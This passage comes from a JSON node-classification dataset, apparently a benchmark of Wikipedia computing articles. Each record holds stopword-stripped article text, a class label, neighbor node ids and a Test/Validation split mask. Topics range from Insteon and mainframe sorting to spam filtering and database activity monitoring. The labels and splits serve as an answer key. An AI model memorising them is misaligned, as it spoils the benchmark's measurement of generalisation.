unique device assigned factory displayed printed label attached device users must physical access device read device address label manually enter prompted installation security insteon rf devices criticized def con presentation 2015 insteon devices configured applying sequence taps button presses pushbutton device establish direct device-to-device links alternatively central controller may used configure devices insteon device unique identifier code similar mac address technology allows directly linked devices manage identifiers older insteon chip sets manufactured smartlabs transmit receive respond repeat x10 power line messages thus enabling x10 networks interoperate insteon 2014 insteon released home automation system compatible touch-enabled metro interface devices appearing live tiles later added voice control via microsoft cortana 2015 voice control added via compatibility amazon echo year logitech announced harmony hub-based remote would support insteon devices deployed insteon hub also 2015 insteon announced initiative integrate google-owned nest learning thermostat insteon hub insteon one two launch partners apple homekit platform homekit-enabled insteon hub pro 2015 insteon announced support apple watch allowing watch owners control home insteon hub insteon second generation i2/rf replaces first generation i1/rf wireless insteon communications i1/rf i2/rf uses different frequencies operate independently currently one legacy product implements i1/rf signalinc rf signal enhances introduced may 2005 specifications i2/rf",
    "neighbors": [
      8640,
      4609,
      11267,
      10021,
      6023,
      2920,
      9448,
      3248,
      7411,
      10206
    ],
    "mask": "Test"
  },
  {
    "node_id": 8737,
    "label": 2,
    "text": "Mainframe_sort_merge:mainframe sort merge sort/merge utility mainframe program sort records file specified order merge pre-sorted files sorted file copy selected records internally utilities use one standard sorting algorithms often proprietary fine-tuned code mainframes originally supplied limited main memory today standards amount data sorted frequently large unlike recent sort programs early sort/merge programs placed great emphasis efficient techniques sorting data secondary storage typically tape disk 1968 os/360 sort/merge program provided five different sequence distribution techniques could used depending number type devices available 1990 ibm introduced new merge algorithm called blockset dfsort successor os/360 sort/merge historical note blockset algorithm invented ibm systems engineer 1963 discovered ibm archives implemented 1990 sort/merge frequently used often commonly used application program mainframe shop generally consuming twenty percent processing power shop modern sort/merge programs also copy files select omit certain records summarize records remove duplicates reformat records append new data produce reports indeed sort/merge applications use wide range additional processing capabilities rather purely sorting merging records sort/merge product fast way performing input output functions quite number user exits supported may load modules i.e. member library object decks i.e. output assembler sort/merge application loading load modules linking object decks termed dynamic link editing dfsort exit specified required working storage datasets i.e. sortwk01 ... sortwknn may disk tape although blockset algorithm restricted disk working storage working storage datasets generally improves performance sort/merge important enough multiple companies selling sort/merge package ibm mainframes z/os z/vm z/vse operating systems major sort/merge packages companies also sell versions platforms unix linux windows historically alias sort used refer ibm sort/merge third party sort/merge programs i.e. syncsort casort also adopted sort alias product dfsort often referred program name iceman component ice original os/360 sort/merge program name ierrco00 component ier also alias sort",
    "neighbors": [
      1801,
      6797,
      5492,
      7733,
      823,
      2168,
      9977,
      3323,
      2813
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8738,
    "label": 9,
    "text": "Strict_programming_language:strict programming language strict programming language programming language employs strict programming paradigm allowing strict functions functions whose parameters must evaluated completely may called defined user non-strict programming language allows user define non-strict functions hence may allow lazy evaluation nearly programming languages common use today strict examples include c java prior java 8 perl version 5 python ruby common lisp ml examples non-strict languages haskell miranda clean languages whose ordinary functions strict provide macro system build non-strict functions include c c++ scheme non-strict languages non-strictness extends data constructors allows conceptually infinite data structures list prime numbers manipulated way ordinary finite data structures also allows use large finite data structures complete game tree chess non-strictness several disadvantages prevented widespread adoption strict programming languages often associated eager evaluation non-strict languages lazy evaluation evaluation strategies possible case terms eager programming language lazy programming language often used synonyms strict programming language non-strict programming language respectively many strict languages advantages non-strict functions obtained use macros thunks",
    "neighbors": [
      9345,
      8582,
      6536,
      2062,
      8722,
      3475,
      9245,
      3876,
      5677,
      10043,
      3263,
      8262,
      9932,
      7386,
      10083,
      230,
      8554,
      10618,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 8739,
    "label": 9,
    "text": "Model-Glue:model-glue model-glue oo web framework based mvc design pattern goal simplify development oo coldfusion applications released apache software license 2.0 asl2.0 model-glue",
    "neighbors": [
      1920,
      3462,
      8582,
      3469,
      2062,
      9614,
      2576,
      9618,
      148,
      1812,
      4507,
      6941,
      9245,
      10526,
      4512,
      3876,
      4777,
      5165,
      4529,
      7987,
      692,
      8883,
      7862,
      3895,
      5048,
      9144,
      6074,
      190,
      5314,
      9666,
      8644,
      1353,
      595,
      84,
      4056,
      6493,
      102,
      8554,
      8691,
      3705,
      11259
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8740,
    "label": 2,
    "text": "Calendar_(Windows):calendar windows calendar personal calendar application made microsoft microsoft windows offers synchronization calendars using microsoft exchange server outlook.com apple icloud calendar service google calendar supports popular icalendar format microsoft first included calendar application shortened app windows 1.0 included windows 3.1 replaced schedule+ windows workgroups windows nt 3.1 schedule+ later moved windows microsoft office suite windows include another calendar application windows calendar windows vista calendar created beta 2 windows vista version supports sharing subscribing publishing calendars webdav-enabled web servers network shares always supported .ics files subscription feature enables syncing google calendar interface matches windows vista mail two apps connected operating system default calendar renamed new version calendar text-heavy added windows 8 one many apps written run full-screen snapped part microsoft metro design language philosophy one three apps windows originate microsoft outlook two mail people apps structurally three apps one installed uninstalled user interface calendar windows 8 originally supported outlook.com exchange google calendar facebook calendars api changes facebook google calendars longer directly synced windows 8 like many microsoft apps introduced windows 8 many features hidden charms menu bottom screen triggered right clicking different calendars labeled different colors user microsoft account adds calendar account one computer windows 8 calendar account automatically added windows 8 computers user logged .ics files supported version mail preset server configurations outlook.com exchange google calendar icloud calendar users set use system theme choose custom accent color background image light/dark preference windows 10 calendar multi-window support viewing editing events different calendars labeled different colors events rearranged dragging dropping default interface month view users also use day week year views print views windows 10 app also uses flyout settings panel mini ribbon interface viewing pane day year calendar events show live tile like vista version important controls readily visible use icons match system accounts grouped relabeled folders edited within app .ics support added version time windows 10 anniversary update",
    "neighbors": [
      11270,
      5643,
      4624,
      11285,
      537,
      540,
      3102,
      9762,
      8227,
      1577,
      10281,
      2101,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      10839,
      603,
      9819,
      8798,
      3170,
      8296,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      639,
      10879,
      8841,
      6797,
      2193,
      9874,
      10900,
      4248,
      5784,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      2221,
      5300,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      2782,
      9442,
      4836,
      4326,
      2279,
      9448,
      1770,
      3308,
      10993,
      3834,
      1791,
      8959,
      11519,
      3856,
      3351,
      8473,
      8985,
      11546,
      8988,
      5413,
      5928,
      3881,
      6441,
      10024,
      10026,
      10029,
      7983,
      1844,
      9525,
      11572,
      10039,
      6972,
      3394,
      3922,
      4439,
      5465,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      2943,
      10118,
      1418,
      5003,
      5004,
      8080,
      11677,
      929,
      11683,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      960,
      7106,
      8132,
      6088,
      969,
      3535,
      8659,
      1498,
      5594,
      478,
      6114,
      6115,
      6637,
      9709,
      6641,
      3573,
      2046
    ],
    "mask": "Test"
  },
  {
    "node_id": 8741,
    "label": 5,
    "text": "High_Frequency_Internet_Protocol:high frequency internet protocol high frequency internet protocol hfip hf-ip usually associated automatic link establishment hf radio data communications hfip provides protocol layers enabling internet file transfer chat web email hfip commonly uses ionospheric propagation radio waves form wide area network span thousands kilometers hf transceivers hfip service typically run 20 150 watts portable mobile units approximately 2000 watts transmitter output high power base stations hfip servers stanag 5066 common hfip standard amateur radio hfip network called hflink uses automatic link establishment initiating data communications arq 8fsk frequency-shift keying psk phase-shift keying signals",
    "neighbors": [
      2752,
      2920,
      119
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8742,
    "label": 1,
    "text": "Database_activity_monitoring:database activity monitoring database activity monitoring dam a.k.a enterprise database auditing real-time protection database security technology monitoring analyzing database activity operates independently database management system dbms rely form native dbms-resident auditing native logs trace transaction logs dam typically performed continuously real-time database activity monitoring prevention damp extension dam goes beyond monitoring alerting also block unauthorized activities dam helps businesses address regulatory compliance mandates like payment card industry data security standard pci dss health insurance portability accountability act hipaa sarbanes-oxley act sox u.s. government regulations nist 800-53 eu regulations dam also important technology protecting sensitive databases external attacks cybercriminals according 2009 verizon business ’ data breach investigations report—based data analyzed verizon business ’ caseload 90 confirmed breaches involving 285 million compromised records 2008—75 percent breached records came compromised database servers according gartner “ dam provides privileged user application access monitoring independent native database logging audit functions function compensating control privileged user separation-of-duties issues monitoring administrator activity technology also improves database security detecting unusual database read update activity application layer database event aggregation correlation reporting provide database audit capability without need enable native database audit functions become resource-intensive level auditing increased ” according survey independent oracle user group ioug “ organizations mechanisms place prevent database administrators privileged database users reading tampering sensitive information financial hr business applications still unable even detect breaches incidents. ” forrester refers category “ database auditing real-time protection ” privileged user monitoring monitoring privileged users superusers database administrators dbas systems administrators sysadmins developers help desk outsourced personnel – typically unfettered access corporate databases – essential protecting external internal threats privileged user monitoring includes auditing activities transactions identifying anomalous activities viewing sensitive data creating new accounts superuser privileges reconciling observed activities adding deleting tables authorized change requests since organizations already protected perimeter level indeed major concern lies need monitor protect privileged users high correlation therefore database security need protect insider threat complex task privileged users capable using sophisticated techniques attack database stored procedures triggers views obfuscated traffic attacks may difficult detect using traditional methods addition since targeted attacks frequently result attackers gaining privileged user credentials monitoring privileged activities also effective way identify compromised systems result auditors demanding monitoring privileged users security best practices well wide range regulations privileged user monitoring helps ensure • data privacy authorized applications users viewing sensitive data • data governance critical database structures values changed outside corporate change control procedures application activity monitoring primary purpose application activity monitoring provide greater level end-user accountability detect fraud abuses legitimate access occurs via enterprise applications rather via direct access database multi-tier enterprise applications oracle ebs peoplesoft jd edwards sap siebel systems business intelligence custom applications built standard middle-tier servers ibm websphere oracle weblogic server mask identity end-users database transaction level done optimization mechanism known “ connection pooling. ” using pooled connections application aggregates user traffic within database connections identified generic service account name application activity monitoring allows organizations associate specific database transactions particular application end-users order identify unauthorized suspicious activities end-user accountability often required data governance requirements sarbanes–oxley act new auditor guidance public company accounting oversight board sox compliance also increased emphasis anti-fraud controls cyberattack protection sql injection type attack used exploit bad coding practices applications use relational databases attacker uses application send sql statement composed application statement concatenated additional statement attacker introduces many application developers compose sql statements concatenating strings use prepared statement case application susceptible sql injection attack technique transforms application sql statement innocent sql call malicious call cause unauthorized access deletion data theft information one way dam prevent sql injection monitoring application activity generating baseline “ normal behavior ” identifying attack based divergence normal sql structures normal sequences alternative approaches monitor memory database database execution plan context sql statements visible based policy provide granular protection object level defined gartner “ dam tools use several data collection mechanisms server-based agent software in-line out-of-band network collectors aggregate data central location analysis report based behaviors violate security policies and/or signatures indicate behavioral anomalies dam demand driven primarily need privileged user monitoring address compliance-related audit findings threat-management requirements monitor database access enterprise dam requirements beginning broaden extending beyond basic functions capability detect malicious activity inappropriate unapproved database administrator dba access. ” advanced dam functions include enterprises also seeking functions including interception-based modern dam systems collect database able “ see ” communications database client database server dam systems find places view communication stream get requests responses without requiring participation database interception done multiple points database memory e.g sga network using network tap span port communication encrypted operating system level level database libraries unencrypted network traffic packet sniffing used advantage processing done host however main disadvantage local traffic sophisticated intra-database attacks detected capture local access network based vendors deploy probe runs host probe intercepts local access also intercept networked access case want use network gear case database communications encrypted however since agent processing — instead relays data dam appliance processing occurs — may impact network performance local traffic real-time session termination may slow interrupt unauthorized queries memory-based dam systems lightweight sensor attaches protected databases continuously polls system global area sga collect sql statements performed similar architecture previously used performance optimization products also used sga shared data structures latest versions technology lightweight sensor runs host attaches process os level inspect private data structures advantages approach significant log-based dam systems analyze extract information transaction logs e.g. redo logs systems use fact much data stored within redo logs scrape logs unfortunately information required redo logs example select statements systems augment data gather redo logs data collect native audit trails shown figure 3 systems hybrid true dam system fully independent dbms siem relies data generated database architectures usually imply overhead database server",
    "neighbors": [
      2688,
      899,
      9481,
      10505,
      10258,
      10518,
      8471,
      4376,
      9112,
      7968,
      290,
      1314,
      7461,
      10413,
      5550,
      7983,
      5808,
      10418,
      10546,
      9527,
      3768,
      3004,
      700,
      9661,
      9663,
      4416,
      2369,
      5441,
      11457,
      8518,
      72,
      853,
      2901,
      9942,
      9177,
      987,
      860,
      9183,
      1250,
      11362,
      10471,
      8808,
      6383,
      9079,
      2681,
      9467
    ],
    "mask": "Test"
  },
  {
    "node_id": 8743,
    "label": 1,
    "text": "Disclosure_and_Barring_Service:disclosure barring service disclosure barring service dbs non-departmental public body home office united kingdom dbs enables organisations public private voluntary sectors make safer recruitment decisions identifying candidates may unsuitable certain work especially involving children vulnerable adults provides wider access criminal record information disclosure service england wales dbs formed 2012 merging functions criminal records bureau crb independent safeguarding authority isa protection freedoms act 2012 dbs started operating 1 december 2012 operates liverpool royal wootton bassett equivalent agencies disclosure scotland scotland access northern ireland northern ireland legal requirement uk regulated activity employers notify dbs person leaves changes job relation harmed someone offence person barred dbs work apply work group children adults barred also offence employer knowingly employ barred person regulated activity group barred organisation entitled ask exempted questions rehabilitation offenders act 1974 must register dbs registered dbs umbrella body request dbs check applicant applicant applies dbs application countersigned dbs registered organisation umbrella body applicant criminal record accessed police national computer pnc well checked appropriate lists people considered unsuitable work children vulnerable people maintained dbs formerly maintained independent safeguarding authority copy completed certificate sent applicant home address individual organisation safeguarding concerns regarding member staff make safeguarding referral dbs work multiple agencies assess whether individual barred working regulated activity children and/or vulnerable groups criminal records bureau established part v police act 1997 launched march 2002 following public concern safety children young people vulnerable adults found british police forces adequate capability resources routinely process fulfil large number criminal record checks requested timely fashion dedicated agency set administer function employers temporary staff agencies bemoaned time takes worker cleared dbs effort cut waiting times government allowed establishment adult first may 2002 department education began maintaining list individuals suitable work children list originally named list 99 later named isa children barred list maintained independent safeguarding authority finally dbs children barred list maintained disclosure barring service care standards act 2000 department health introduced adult version list 99 named 'pova first 26 july 2004 later renamed 'isa adult first finally 'dbs adult first adult first list 99 services allow registered bodies eligible check whether applicant appears dbs adults children barred list online checking system takes around two working days turn around check clean organisation may provisionally employ applicant subject increased level supervision return post full disclosure 17 june 2013 dbs update service launched intended improve ease applying criminal record checks create significant savings 1 february 2018 national audit office published investigation report highly critical dbs 2009 home office launched programme increase efficiency safeguarding services key aims programme reduce cost running disclosure service customers using new cheaper update service rather continuing use existing types disclosure certificates home office expected 2.8 million paying users using new update service 2017–18 market tested actual number users around one million according national audit office investigation modernisation programme running three half years late expected costs increased £229 million dbs currently negotiating contractor tata consultancy services delays modernisation programme update service expected increase ease frequency people checked thereby improving safeguarding home office dbs know many people prevented working children vulnerable adults use information process dbs provides criminal record data called dbs certificate dbs check previously crb check four levels dbs checks basic standard enhanced enhanced barred list checks basic disclosures see disclosure scotland dbs checks obtained members public directly available organisations professions offices employments work occupations listed exceptions order 1975 rehabilitation offenders act 1974 amended protection freedoms act 2012 17 june 2013 dbs update service launched intended improve ease applying criminal record checks create significant savings fee £13 year applicants may use certificate within sector disclosure level workforce details barring list checks volunteer status employer consent run dbs update check check existing certificate date check applicant identity certificate authenticity january 2018 basic dbs checks introduced disclose details cautions convictions deemend unspent rehabilitation offenders act 1974 basic dbs check disclose cautions reprimands warnings convictions deemed unspent according rehabilitation offenders act 1974 service provided dbs england wales disclosure scotland applicants scotland applications also done online employer reference dbs check could taken requirement standard enhanced check meant disclosure cautions convictions even spent however introduction basic check employers specify check required advertising job aim service reduce need unnecessary ineligible standard enhanced checks apply one responsible organisations list organisations websites apply check standard dbs check primarily positions high responsibility example accountancy security standard certificates reveal details convictions cautions reprimands warnings applicant received qualify filtering standard check may applied applicant job role specified police act 1997 amended protection freedoms act 2012 enhanced dbs checks positions involving certain activities teaching children treating adults also obtained certain professions example judicial appointments rspca officers enhanced check may applied applicant job role specified rehabilitation offenders act 1974 exception order 1975 police act 1997 addition information provided standard certificate enhanced certificate involves additional check police check information held file may relevant instance information led criminal conviction may indicate danger vulnerable groups police decide additional information added certificate using quality assurance framework involvement local police forces mean enhanced check may take significantly longer standard check completed includes enhanced certificate plus check appropriate dbs barred list two dbs barred lists one adults one children lists contain information whether applicant barred working either two groups individual may checked one barred lists job role classified regulated activity children and/or adults safeguarding vulnerable groups act 2006 roles might barred include work within outside people homes areas postal work would access personal documents dbs began filter certain criminal information dbs certificate met guidelines laid rehabilitation offenders act 1974 exceptions order 1975 amendment england wales order 2013 dbs work number standards criminal record checking service barring case accuracy performance service standards also agreed dbs police disclosure units crb due partner isa administering newly created vetting barring scheme 2009 suspended 2010 pending review following 2010 general election review published february 2011 making recommendations merger criminal records bureau independent safeguarding authority one new non-departmental public body disclosure barring service responsible barring individuals completing criminal record checks protection freedoms act 2012 dbs require registration details retained database procedures crb tightened following soham murders trial ian huntley former caretaker found guilty murdering two girls cambridgeshire primary school 2002 huntley suspected string offences including rape indecent assault burglary conviction murders riding uninsured unlicensed motorcycle burglary charge remained file january 2006 following controversies resulting cases staff hired schools full crb check carried department education skills stated employers obtain crb enhanced disclosure respect teachers recruit person placed school huntley hired november 2001 crb came force sociologist frank furedi stated crb checks provide cast-iron guarantee children safe particular adult use created atmosphere suspicion poisoning relationships generations many ordinary parents finding regarded potential child abusers restrictions imposed crb check process contributed shortage adult volunteers organizations girlguiding uk 2009 crb enhanced disclosure criticised including details minor contact individual police even formal action taken",
    "neighbors": [
      5602
    ],
    "mask": "Test"
  },
  {
    "node_id": 8744,
    "label": 4,
    "text": "Egress_Software:egress software egress software technologies ltd uk-based software company provides range data security services designed protect shared information throughout lifecycle offering on-demand security organisations individuals sharing confidential information electronically egress develops security software including email encryption secure online collaboration document email classification email file archiving egress founded 2007 tony pepper neil larkins john goodyear major use egress switch software secure transfer emails documents non-secure email addresses october 2013 egress switch certified cesg desktop gateway email encryption security characteristics part commercial product assurance program makes switch suitable sharing il2 low-threat il3 data guidelines official official sensitive 2014 uk government security classifications policy certification lies national cyber security centre ncsc currently extended 20 december 2019 may 2014 egress switch encryption services became available procure via g-cloud 5 framework uk government program committed adoption cloud services across public sector g-cloud framework public sector organizations able procure following egress switch services switch secure email switch secure file transfer switch secure web form via number egress value added resellers also may 2014 egress switch secure email listed nato information assurance product catalogue provides 28 nato nations well civil military bodies directory information assurance products protection profiles packages use available procurement meet operational requirements",
    "neighbors": [
      7979,
      4194,
      4595,
      11046
    ],
    "mask": "Test"
  },
  {
    "node_id": 8745,
    "label": 8,
    "text": "Google_Web_Server:google web server google web server gws proprietary web server software google uses web infrastructure gws used exclusively inside google ecosystem website hosting 2008 gws team lead bharat mediratta sometimes gws described one guarded component google infrastructure 2010 gws reported serving 13 web sites world may 2015 gws ranked fourth popular web server internet apache nginx microsoft iis powering estimated 7.95 active websites web page requests google pages provide gws without version number http header indication web server software used information regarding gws scarce blog post google chicago office 2011 google provided details gws",
    "neighbors": [
      225,
      865,
      3237,
      7983,
      4439
    ],
    "mask": "None"
  },
  {
    "node_id": 8746,
    "label": 4,
    "text": "Key-recovery_attack:key-recovery attack key-recovery attack adversary attempt recover cryptographic key encryption scheme historically cryptanalysis block ciphers focused key-recovery security sorts attacks weak guarantee since may necessary recover key obtain partial information message decrypt message entirely modern cryptography uses robust notions security recently indistinguishability adaptive chosen-ciphertext attack ind-cca2 security become golden standard security obvious key-recovery attack exhaustive key-search attack modern ciphers often key space size formula_1 greater making attacks infeasible current technology",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 8747,
    "label": 4,
    "text": "Naive_Bayes_spam_filtering:naive bayes spam filtering naive bayes classifiers popular statistical technique e-mail filtering typically use bag words features identify spam e-mail approach commonly used text classification naive bayes classifiers work correlating use tokens typically words sometimes things spam non-spam e-mails using bayes theorem calculate probability email spam naive bayes spam filtering baseline technique dealing spam tailor email needs individual users give low false positive spam detection rates generally acceptable users one oldest ways spam filtering roots 1990s bayesian algorithms used sort filter email 1996 although naive bayesian filters become popular later multiple programs released 1998 address growing problem unwanted email first scholarly publication bayesian spam filtering sahami et al 1998 work soon thereafter deployed commercial spam filters however 2002 paul graham greatly decreased false positive rate could used single spam filter variants basic technique implemented number research works commercial software products many modern mail clients implement bayesian spam filtering users also install separate email filtering programs server-side email filters dspam spamassassin spambayes bogofilter assp make use bayesian spam filtering techniques functionality sometimes embedded within mail server software crm114 oft cited bayesian filter intended use bayes filter production includes ″unigram″ feature reference particular words particular probabilities occurring spam email legitimate email instance email users frequently encounter word viagra spam email seldom see email filter n't know probabilities advance must first trained build train filter user must manually indicate whether new email spam words training email filter adjust probabilities word appear spam legitimate email database instance bayesian spam filters typically learned high spam probability words viagra refinance low spam probability words seen legitimate email names friends family members training word probabilities also known likelihood functions used compute probability email particular set words belongs either category word email contributes email spam probability interesting words contribution called posterior probability computed using bayes theorem email spam probability computed words email total exceeds certain threshold say 95 filter mark email spam spam filtering technique email marked spam automatically moved junk email folder even deleted outright software implement quarantine mechanisms define time frame user allowed review software decision initial training usually refined wrong judgements software identified false positives false negatives allows software dynamically adapt ever-evolving nature spam spam filters combine results bayesian spam filtering heuristics pre-defined rules contents looking message envelope etc resulting even higher filtering accuracy sometimes cost adaptiveness bayesian email filters utilize bayes theorem bayes theorem used several times context spam let suppose suspected message contains word replica people used receiving e-mail know message likely spam precisely proposal sell counterfeit copies well-known brands watches spam detection software however know facts compute probabilities formula used software determine derived bayes theorem statistics show current probability message spam 80 least however bayesian spam detection software makes assumption priori reason incoming message spam rather ham considers cases equal probabilities 50 filters use hypothesis said biased meaning prejudice regarding incoming email assumption permits simplifying general formula functionally equivalent asking percentage occurrences word replica appear spam messages quantity called spamicity spaminess word replica computed number formula_4 used formula approximated frequency messages containing replica messages identified spam learning phase similarly formula_6 approximated frequency messages containing replica messages identified ham learning phase approximations make sense set learned messages needs big representative enough also advisable learned set messages conforms 50 hypothesis repartition spam ham i.e datasets spam ham size course determining whether message spam ham based presence word replica error-prone bayesian spam software tries consider several words combine spamicities determine message overall probability spam bayesian spam filtering algorithms based formulas strictly valid probabilistic standpoint words present message independent events condition generally satisfied example natural languages like english probability finding adjective affected probability noun useful idealization especially since statistical correlations individual words usually known basis one derive following formula bayes theorem formula referenced paul graham 2002 article early commentators stated graham pulled formulas thin air graham actually referenced source included detailed explanation formula idealizations based spam filtering software based formula sometimes referred naive bayes classifier naive refers strong independence assumptions features result p typically compared given threshold decide whether message spam p lower threshold message considered likely ham otherwise considered likely spam usually p directly computed using formula due floating-point underflow instead p computed log domain rewriting original equation follows taking logs sides let formula_22 therefore hence alternate formula computing combined probability case word never met learning phase numerator denominator equal zero general formula spamicity formula software decide discard words information available generally words encountered times learning phase cause problem would error trust blindly information provide simple solution simply avoid taking unreliable words account well applying bayes theorem assuming classification spam ham emails containing given word replica random variable beta distribution programs decide use corrected probability corrected probability used instead spamicity combining formula formula_3 taken equal 0.5 avoid suspicious incoming email 3 good value meaning learned corpus must contain 3 messages word put confidence spamicity value default value formula extended case n equal zero spamicity defined evaluates case formula_32 neutral words like english equivalents languages ignored generally bayesian filtering filters simply ignore words spamicity next 0.5 contribute little good decision words taken consideration whose spamicity next 0.0 distinctive signs legitimate messages next 1.0 distinctive signs spam method example keep ten words examined message greatest absolute value |0.5 − pi software products take account fact given word appears several times examined message others n't software products use patterns sequences words instead isolated natural languages words example context window four words compute spamicity viagra good instead computing spamicities viagra good method gives sensitivity context eliminates bayesian noise better expense bigger database ways combining individual probabilities different words using naive approach methods differ assumptions make statistical properties input data different hypotheses result radically different formulas combining individual probabilities example assuming individual probabilities follow chi-squared distribution 2 n degrees freedom one could use formula c inverse chi-squared function individual probabilities combined techniques markovian discrimination one main advantages bayesian spam filtering trained per-user basis spam user receives often related online user activities example user may subscribed online newsletter user considers spam online newsletter likely contain words common newsletters name newsletter originating email address bayesian spam filter eventually assign higher probability based user specific patterns legitimate e-mails user receives tend different example corporate environment company name names clients customers mentioned often filter assign lower spam probability emails containing names word probabilities unique user evolve time corrective training whenever filter incorrectly classifies email result bayesian spam filtering accuracy training often superior pre-defined rules perform particularly well avoiding false positives legitimate email incorrectly classified spam example email contains word nigeria frequently used advance fee fraud spam pre-defined rules filter might reject outright bayesian filter would mark word nigeria probable spam word would take account important words usually indicate legitimate e-mail example name spouse may strongly indicate e-mail spam could overcome use word nigeria depending implementation bayesian spam filtering may susceptible bayesian poisoning technique used spammers attempt degrade effectiveness spam filters rely bayesian filtering spammer practicing bayesian poisoning send emails large amounts legitimate text gathered legitimate news literary sources spammer tactics include insertion random innocuous words normally associated spam thereby decreasing email spam score making likely slip past bayesian spam filter however example paul graham scheme significant probabilities used padding text non-spam-related words affect detection probability significantly words normally appear large quantities spam may also transformed spammers example « viagra » would replaced « viaagra » « v agra » spam message recipient message still read changed words words met rarely bayesian filter hinders learning process general rule spamming technique work well derived words end recognized filter like normal ones another technique used try defeat bayesian spam filters replace text pictures either directly included linked whole text message part replaced picture text drawn spam filter usually unable analyze picture would contain sensitive words like « viagra » however since many mail clients disable display linked pictures security reasons spammer sending links distant pictures might reach fewer targets also picture size bytes bigger equivalent text size spammer needs bandwidth send messages directly including pictures filters inclined decide message spam mostly graphical contents solution used google gmail email system perform ocr optical character recognition every mid large size image analyzing text inside bayesian filtering used widely identify spam email technique classify cluster almost sort data uses science medicine engineering one example general purpose classification program called autoclass originally used classify stars according spectral characteristics otherwise subtle notice",
    "neighbors": [
      6274,
      1667,
      9222,
      3336,
      4105,
      4490,
      8202,
      7949,
      914,
      5012,
      10263,
      1305,
      11418,
      412,
      8093,
      8224,
      10275,
      4272,
      2101,
      9792,
      11330,
      4294,
      3145,
      1098,
      6094,
      7763,
      7764,
      1495,
      3032,
      9053,
      5857,
      4325,
      6762,
      1771,
      1899,
      1653,
      1529
    ],
    "mask": "Test"
  },
  {
    "node_id": 8748,
    "label": 0,
    "text": "ROUGE_(metric):rouge metric rouge recall-oriented understudy gisting evaluation set metrics software package used evaluating automatic summarization machine translation software natural language processing metrics compare automatically produced summary translation reference set references human-produced summary translation following five evaluation metrics available",
    "neighbors": [
      7780,
      7164,
      5197
    ],
    "mask": "Test"
  },
  {
    "node_id": 8749,
    "label": 9,
    "text": "Novius_OS:novius os novius os content management system cms open source affero general public license v3 designed multi-channel internet create publish everywhere published novius company since 2011 novius os project launched company novius december 2011 publishing company since 2004 proprietary cms publi-nova decided embark open-source create new cms designed multi-channel internet novius os distributed gnu agpl v3 license uses latest web technologies based framework fuelphp side interface uses html5 jquery ui wijmo tinymce plugins like android versions named dessert major novius os versions listed alphabetical order named city first stable version os novius launched september 2012 version 0.1 renamed amsterdam posteriori version included expected standard elements cms publishing pages blog entries creating users managing permissions first notable features novius os specific business applications library multi-language system tabbed browsing makes multitasking cms version 0.2 launched february 2013 also known posteriori berlin version brings new cms applications forms management slide application create app allows developers easily quickly create novius os application database ui etc.. also notes emergence multi-context managing multiple sites multiple languages – single back office chiba version launched april 2013 tribute work done japanese community fully reflects novius os japanese version advanced rights system implemented planning publications cache cms also improved novius os contest bar camp exhibiting www2012 international gathering around future challenges web originally created robert cailliau co-founder tim berners-lee web week novius os presented several personalities giving first echo project novius os also present cms day 2012 2013 european rally around open source cms novius os available github runs lamp stack written php 5.3 mvc architecture uses framework fuelphp interfaces using html5 jquery ui wijmo library novius os built application system image object-oriented programming application may extended others customized extended additional features application different components launchers enhancers templates data catchers allow flow data applications also outside addition native applications provided novius os e.g collections web pages possible create specific business applications using wizard create app wizard allows quickly easily generate basis new application models fields group fields app desk launchers enhancers url etc..",
    "neighbors": [
      8644
    ],
    "mask": "Test"
  },
  {
    "node_id": 8750,
    "label": 4,
    "text": "Perry_Fellwock:perry fellwock perry fellwock born 1947 former national security agency nsa analyst whistleblower revealed existence nsa worldwide covert surveillance network interview using pseudonym winslow peck ramparts 1971 time fellwock blew whistle echelon nsa nearly unknown organization among secretive us intelligence agencies fellwock revealed significantly larger budget central intelligence agency cia fellwock motivated daniel ellsberg release pentagon papers today fellwock acknowledged first nsa whistleblower echelon name popularly given signals intelligence sigint collection analysis network operated behalf five signatory states called five eyes fvey ukusa security agreement according information european parliament document existence global system interception private commercial communications echelon interception system echelon ostensibly created monitor military diplomatic communications soviet union eastern bloc allies cold war early 1960s fellwock revelations u.s. senate united states senate select committee study governmental operations respect intelligence activities church committee chaired frank church introduced successful legislation 1973 stop nsa spying american citizens speaking echelon frank church said ... hat capability time could turned around american people american would privacy left capability monitor everything telephone conversations telegrams n't matter would place hide government ever became tyranny dictator ever took charge country technological capacity intelligence community given government could enable impose total tyranny would way fight back careful effort combine together resistance government matter privately done within reach government know capability technology ... n't want see country ever go across bridge know capacity make tyranny total america must see agency agencies possess technology operate within law proper supervision never cross abyss abyss return church committee hearings congressional hearings abuses nixon administration committee chaired sam ervin helped lead passage foreign intelligence surveillance act fisa 1978 fisa prescribes procedures physical electronic surveillance collection foreign intelligence information foreign powers agents foreign powers may include american citizens permanent residents suspected espionage terrorism 1978 september 11 attacks law amended enabling president george w. bush expand warrantless surveillance american citizens",
    "neighbors": [
      8356,
      3495,
      6344,
      7887,
      208,
      4595,
      7893,
      4118,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 8751,
    "label": 7,
    "text": "Middleware_(distributed_applications):middleware distributed applications middleware context distributed applications software provides services beyond provided operating system enable various components distributed system communicate manage data middleware supports simplifies complex distributed applications includes web servers application servers messaging similar tools support application development delivery middleware especially integral modern information technology based xml soap web services service-oriented architecture middleware often enables interoperability applications run different operating systems supplying services application exchange data standards-based way middleware sits middle application software may working different operating systems similar middle layer three-tier single system architecture except stretched across multiple systems applications examples include eai software telecommunications software transaction monitors messaging-and-queueing software distinction operating system middleware functionality extent arbitrary core kernel functionality provided operating system functionality previously provided separately sold middleware integrated operating systems typical example tcp/ip stack telecommunications nowadays included virtually every operating system software provides link separate software applications middleware sometimes called plumbing connects two applications passes data middleware allows data contained one database accessed another definition would fit enterprise application integration data integration software objectweb defines middleware software layer lies operating system applications side distributed computing system network middleware relatively new addition computing landscape gained popularity 1980s solution problem link newer applications older legacy systems although term use since 1968 also facilitated distributed processing connection multiple applications create larger application usually network middleware services provide 